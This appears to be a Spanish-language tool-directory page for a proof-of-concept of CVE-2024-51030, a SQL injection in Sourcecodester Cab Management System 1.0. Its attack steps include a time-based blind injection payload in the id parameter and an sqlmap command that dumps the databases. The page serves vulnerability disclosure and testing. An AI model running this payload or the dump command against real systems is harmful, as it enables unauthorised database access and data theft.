Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-51030 — Exploit de prueba de concepto para inyección SQL en Sourcecodester Cab Management System 1.0, que demuestra la ejecución arbitraria de SQL a través del parámetro id en manage_client.php y view_cab.php. | Kitploit
Herramientas/GitHubGitHub/vighneshnair7/cve-2024-51030
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHubvighneshnair7/cve-2024-51030

CVE-2024-51030

Exploit de prueba de concepto para inyección SQL en Sourcecodester Cab Management System 1.0, que demuestra la ejecución arbitraria de SQL a través del parámetro id en manage_client.php y view_cab.php.

Ver Repositorio
12hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-51030

Descripción

Una vulnerabilidad de inyección SQL en manage_client.php y view_cab.php de Sourcecodester Cab Management System 1.0 permite a atacantes remotos ejecutar comandos SQL arbitrarios a través del parámetro id, lo que conduce a acceso no autorizado y posible compromiso de datos sensibles dentro de la base de datos.

Tipo de Vulnerabilidad

Inyección SQL

Proveedor del Producto

Sourcecodester

Base de Código del Producto Afectado:

https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

Componente Afectado:

El Sourcecodester Cab Management System v1.0 es vulnerable a inyección SQL a través del parámetro id en las páginas manage_client.php y view_cab.php.

Vectores de Ataque:

  • Configure la aplicación localmente e inicie sesión utilizando las credenciales de administrador predeterminadas proporcionadas o también puede iniciar sesión utilizando un usuario administrador con pocos privilegios (como staff).
  • Ahora, navegue a la siguiente URL en su navegador: http://localhost/cms/admin/?page=clients/manage_client&id=1
  • Inyecte el Payload SQL: Modifique el parámetro id en la URL para incluir un payload de inyección SQL ciega basada en booleano o basada en tiempo: http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
  • Observe la Respuesta de la Aplicación: La página debería tardar notablemente más (5 segundos) en cargar si la inyección es exitosa, confirmando que el parámetro id es vulnerable a inyección SQL.
  • Ahora use la herramienta SQLMap para una mayor explotación y volcado de bases de datos usando el siguiente comando: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
  • Referencias:

    1. https://owasp.org/www-community/attacks/SQL_Injection
    2. https://portswigger.net/web-security/sql-injection
    Descargar herramienta